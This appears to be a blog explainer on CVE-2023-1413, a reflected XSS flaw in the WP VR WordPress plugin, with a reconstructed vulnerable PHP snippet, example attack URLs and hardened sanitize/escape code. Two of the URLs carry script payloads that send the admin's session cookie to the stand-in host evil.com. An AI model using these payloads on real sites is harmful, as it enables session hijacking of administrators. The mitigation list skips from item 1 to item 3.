CVE-2023-1413 is an important security issue that affects the popular WP VR plugin for WordPress, versions up to 8.2.9. In this post, I’ll explain in simple language what the vulnerability is, how attackers can use it, and show a practical exploit example. We’ll also look at best practices to stay protected.

What is WP VR and What Happened?

WP VR lets you create 360-degree virtual tours easily on your WordPress website. It’s widely used by real estate agents, museums, and businesses that want an immersive experience for visitors.

The Problem:  
Versions before 8.2.9 of this plugin have a bug: they do not sanitize or escape certain parameters from the user input before showing them on the web page. This small mistake leads to what’s called a Reflected Cross-Site Scripting (XSS) vulnerability.

What is Reflected Cross-Site Scripting (XSS)?

Reflected XSS is when an attacker tricks a victim (such as an admin user) into visiting a crafted URL. Dangerous JavaScript code from the attacker ends up immediately running in the victim’s browser with the permissions of that logged-in user.

References (For the Details)

- WPScan Advisory: CVE-2023-1413
- NVD Listing: CVE-2023-1413
- WP VR Plugin
- Original Patch (8.2.9 Changelog)

The Vulnerable Code (Reconstructed Example)

Inside one of WP VR’s PHP files, parameters from GET or POST requests are shown directly on the page, like:

<!-- BAD: No sanitizing or escaping -->
<div id="wpvr-message">
  <?php echo $_GET['message']; ?>
</div>

If the message parameter in the URL contains HTML or JavaScript, it will run when the admin views the page.

https://example.com/wp-admin/admin.php?page=wpvr&message=<script>fetch('https://evil.com?c='+document.cookie)</script>

If the admin clicks it, their browser runs the attacker’s evil code — here, stealing the admin’s cookie.

Let’s create a simple XSS payload

https://yoursite.com/wp-admin/admin.php?page=wpvr&message=<script>alert('Hacked!')</script>

If an admin visits this link, an alert pops up. A real attacker would use more hidden code to grab the admin’s credentials, not just an alert.

https://yoursite.com/wp-admin/admin.php?page=wpvr&message=<script>new Image().src='https://evil.com/?cookie='+document.cookie</script>

Every time an admin clicks this link, their session cookie is sent to the attacker’s server.
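On the plugin side, the fix is the one WordPress has always recommended: sanitize the value when you read it, and escape it when you print it. The snippet below is an added example written for this post, not WP VR's actual code or its 8.2.9 patch; it assumes it runs inside a WordPress admin page callback (so `sanitize_text_field()`, `wp_unslash()` and `esc_html()` are available) and uses the hypothetical function names `wpvr_example_*`. It also shows a stricter design that avoids reflecting free text at all by mapping a short message key to a fixed string.

```php
<?php
// Added example (not WP VR's code): hardened handling of the same "message" parameter.
// Assumes the WordPress API is loaded, as it is inside an admin page callback.

/**
 * Read the "message" query parameter safely.
 * Returns an empty string when the parameter is absent.
 */
function wpvr_example_get_message() {
    if ( ! isset( $_GET['message'] ) ) {
        return '';
    }
    // wp_unslash() undoes the slashing WordPress applies to request data;
    // sanitize_text_field() strips tags, invalid UTF-8 and line breaks on INPUT.
    return sanitize_text_field( wp_unslash( $_GET['message'] ) );
}

/**
 * Render the message. esc_html() encodes <, >, &, " and ' on OUTPUT,
 * so a value that slipped past input sanitization becomes inert text,
 * not markup the browser executes.
 */
function wpvr_example_render_message( $message ) {
    if ( '' === $message ) {
        return '';
    }
    return '<div id="wpvr-message">' . esc_html( $message ) . '</div>';
}

/**
 * Stricter alternative: never reflect user-supplied text at all.
 * The URL carries a short key (e.g. ?msg=saved) and the plugin maps it
 * to a fixed, developer-controlled string. Unknown keys print nothing.
 * The keys and texts here are constructed for the example.
 */
function wpvr_example_render_message_by_key() {
    $messages = array(
        'saved'   => 'Tour settings saved.',
        'deleted' => 'Tour deleted.',
        'error'   => 'Something went wrong. Please try again.',
    );

    $key = isset( $_GET['msg'] ) ? sanitize_key( wp_unslash( $_GET['msg'] ) ) : '';
    if ( ! isset( $messages[ $key ] ) ) {
        return '';
    }
    // Still escape on output: defense in depth costs nothing here.
    return '<div id="wpvr-message">' . esc_html( $messages[ $key ] ) . '</div>';
}

// Either approach replaces the bare `echo $_GET['message']` from the vulnerable snippet.
echo wpvr_example_render_message( wpvr_example_get_message() );
echo wpvr_example_render_message_by_key();
```

With the first approach, a URL carrying `<script>…</script>` in `message` renders as the literal text `&lt;script&gt;…` inside the div instead of executing. The second approach is what you want for status messages on admin screens: the attacker controls only which of your own fixed strings is shown, so there is nothing to inject.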

1. Update Immediately

If you use WP VR, update to version 8.2.9 or higher. Get the newest version.

3. Use Web Application Firewalls (WAF)

Tools like Wordfence or Sucuri can block XSS attacks automatically.

4. Educate Users

Train your site admins to avoid clicking strange admin links, even if sent by colleagues.

Conclusion

CVE-2023-1413 is a strong reminder of how dangerous even simple coding mistakes can be for WordPress plugins. Always keep your plugins up to date, and if you build custom code, sanitize and escape everything. Administrators should be careful with unfamiliar links, especially on admin screens.

Stay safe, and keep your WordPress secure!

*For more info on this CVE, check the WPScan Advisory and the NVD official page.*

Timeline

Published on: 04/17/2023 13:15:00 UTC
Last modified on: 04/25/2023 19:31:00 UTC